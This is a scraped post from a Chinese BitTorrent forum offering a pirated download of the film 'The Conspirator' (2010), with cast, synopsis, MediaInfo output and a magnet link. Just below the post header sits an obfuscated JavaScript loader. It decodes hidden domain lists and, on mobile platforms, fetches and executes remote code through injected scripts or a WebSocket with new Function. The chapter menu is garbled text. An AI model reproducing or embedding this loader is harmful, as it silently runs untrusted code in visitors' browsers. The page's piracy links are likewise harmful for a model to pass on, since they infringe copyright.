共犯[中文字幕].The.Conspirator.2010.1080p.迅雷下载 9.58GB

版主小s 28天前 235

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 共犯 / 惊杀大阴谋(港) / 女同谋 / 同谋

◎片 名 The Conspirator

◎年 代 2010

◎产 地 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 2011-06-16(中国香港) / 2011-04-15(美国)

◎IMDb链接 https://www.imdb.com/title/tt0968264/

◎豆瓣评分 7.6/10 (4897人评价)

◎豆瓣链接 https://movie.douban.com/subject/3998107/

◎片 长 123分钟

◎导 演 罗伯特·雷德福 Robert Redford (id:1053617)

◎编 剧 格雷戈里·伯恩斯坦 Gregory Bernstein (id:1010312)

◎演 员 詹姆斯·麦卡沃伊 James McAvoy (id:1006958)

罗宾·怀特 Robin Wright (id:1002676)

汤姆·威尔金森 Tom Wilkinson (id:1036397)

埃文·蕾切尔·伍德 Evan Rachel Wood (id:1035652)

阿丽克西斯·布莱德尔 Alexis Bledel (id:1041017)

贾斯汀·朗 Justin Long (id:1017904)

凯文·克莱恩 Kevin Kline (id:1040531)

诺曼·瑞杜斯 Norman Reedus (id:1013802)

托比·凯贝尔 Toby Kebbell (id:1010533)

Russell Cook Russell Cook (id:1200049)

艾米·蒂普顿 Amy Tipton (id:1208277)

Beau Turpin (id:1235670)

Jessica Spaid (id:1262806)

乔纳森·格罗夫 Jonathan Groff (id:1000002)

谢伊·惠格姆 Shea Whigham (id:1165173)

丹尼·赫斯顿 Danny Huston (id:1333426)

科尔姆·米尼 Colm Meaney (id:1019029)

布莱恩·杜尔金 Brian F. Durkin (id:1198489)

Brandon Carroll Brandon Carroll (id:1192131)

Ken Feragen Ken Feragen (id:1185480)

约翰尼·西蒙斯 Johnny Simmons (id:1036412)

斯蒂芬·鲁特 Stephen Root (id:1041136)

詹姆斯·戴尔 James Badge Dale (id:1044722)

John Michael Weatherly John Michael Weatherly (id:1055244)

克里斯·鲍尔 Chris Bauer (id:1067002)

吉姆·特鲁-福斯特 Jim True-Frost (id:1150011)

Gene Witham Gene Witham (id:1162724)

格雷格·夏皮罗 Greg Shapiro (id:1297324)

罗伯特·雷德福 Robert Redford (id:1053617)

马克·艾沙姆 Mark Isham (id:1050293)

纽顿·托马斯·西格尔 Newton Thomas Sigel (id:1276570)

克雷格·麦凯 Craig McKay (id:1291636)

艾薇·考夫曼 Avy Kaufman (id:1288224)

卡琳娜·伊瓦诺夫 Kalina Ivanov (id:1287429)

Louise Frogley Louise Frogley (id:1284250)

理查德·格雷弗斯 Richard Graves (id:1285324)

◎标 签 历史 / 美国电影 / 剧情 / 法律 / 2011 / 政治 / 人性 / 战争

◎简 介

故事开始于林肯总统遇刺身亡之后,有八人因为谋杀总统而遭到了逮捕,42岁的玛丽(罗宾·怀特RobinWright饰)是其中唯一的女性,玛丽经营着一间家庭旅馆,而刺杀总统的全部计划都是在这间旅馆的某个房间里诞生的。艾肯(詹姆斯·麦卡沃伊JamesMcAvoy饰)是一位初出茅庐年轻有为的律师,他奉命为玛丽辩护,虽然艾肯知道就算有他的辩护,玛丽还是难逃死刑的惩罚,但还是决定走一遍流程。

然而,在和玛丽沟通交流后,艾肯渐渐开始怀疑,玛丽真的是无辜的,她只不过是被威胁和被利用的人质。没有人相信玛丽的清白,她的命完完整整的被捏在艾肯的手中。

◎获奖情况 (共1项)

第11届凤凰城影评人协会奖 (2011)

年度被忽略影片(提名)

  1. General

  2. Unique ID : 233946153547312491419376785611257328006 (0xB00063E75D6A9D6D4A9A14558904B186)

  3. Complete name : The.Conspirator.2010.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.58 GiB

  7. Duration : 2 h 2 min

  8. Overall bit rate : 11.2 Mb/s

  9. Encoded date : UTC 2021-06-26 05:28:46

  10. Writing application : mkvmerge v51.0.0 ('I Wish') 64-bit

  11. Writing library : libebml v1.4.0 + libmatroska v1.6.2

  12. Attachments : 文泉驿微米黑.ttf


  13. Video

  14. ID : 5

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 2 h 2 min

  23. Bit rate : 9 675 kb/s

  24. Width : 1 920 pixels

  25. Height : 800 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 8 bits

  32. Scan type : Progressive

  33. Bits/(Pixel*Frame) : 0.263

  34. Stream size : 8.27 GiB (86%)

  35. Writing library : x264 core 161 r3018+53 18a1d6c t_mod_New [(8 & 10)[email protected] X86_64]

  36. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=18 / lookahead_threads=4 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=20.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  37. Language : English

  38. Default : Yes

  39. Forced : No


  40. Audio

  41. ID : 1

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 2 h 2 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 16 bits

  53. Compression mode : Lossy

  54. Stream size : 1.29 GiB (13%)

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 2

  60. Format : ASS

  61. Codec ID : S_TEXT/ASS

  62. Codec ID/Info : Advanced Sub Station Alpha

  63. Duration : 1 h 55 min

  64. Bit rate : 108 b/s

  65. Count of elements : 1831

  66. Compression mode : Lossless

  67. Stream size : 92.1 KiB (0%)

  68. Title : chs

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No


  72. Text #2

  73. ID : 3

  74. Format : ASS

  75. Codec ID : S_TEXT/ASS

  76. Codec ID/Info : Advanced Sub Station Alpha

  77. Duration : 1 h 55 min

  78. Bit rate : 108 b/s

  79. Count of elements : 1831

  80. Compression mode : Lossless

  81. Stream size : 92.1 KiB (0%)

  82. Title : cht

  83. Language : English

  84. Default : No

  85. Forced : No


  86. Text #3

  87. ID : 4

  88. Format : PGS

  89. Muxing mode : zlib

  90. Codec ID : S_HDMV/PGS

  91. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  92. Duration : 1 h 51 min

  93. Bit rate : 41.6 kb/s

  94. Count of elements : 3178

  95. Stream size : 33.2 MiB (0%)

  96. Title : eng

  97. Language : English

  98. Default : No

  99. Forced : No


  100. Menu

  101. 00:00:00.000 : :绗?01 绔?

  102. 00:14:01.966 : :绗?02 绔?

  103. 00:24:08.656 : :绗?03 绔?

  104. 00:34:05.543 : :绗?04 绔?

  105. 00:42:53.863 : :绗?05 绔?

  106. 00:51:56.488 : :绗?06 绔?

  107. 01:02:00.216 : :绗?07 绔?

  108. 01:15:16.178 : :绗?08 绔?

  109. 01:27:18.400 : :绗?09 绔?

  110. 01:38:10.093 : :绗?10 绔?

  111. 01:51:02.614 : :绗?11 绔?

  112. 01:53:52.784 : :绗?12 绔?


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:E7ED1A4A9A8E48542EAE5883D16833B0A95EC61C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回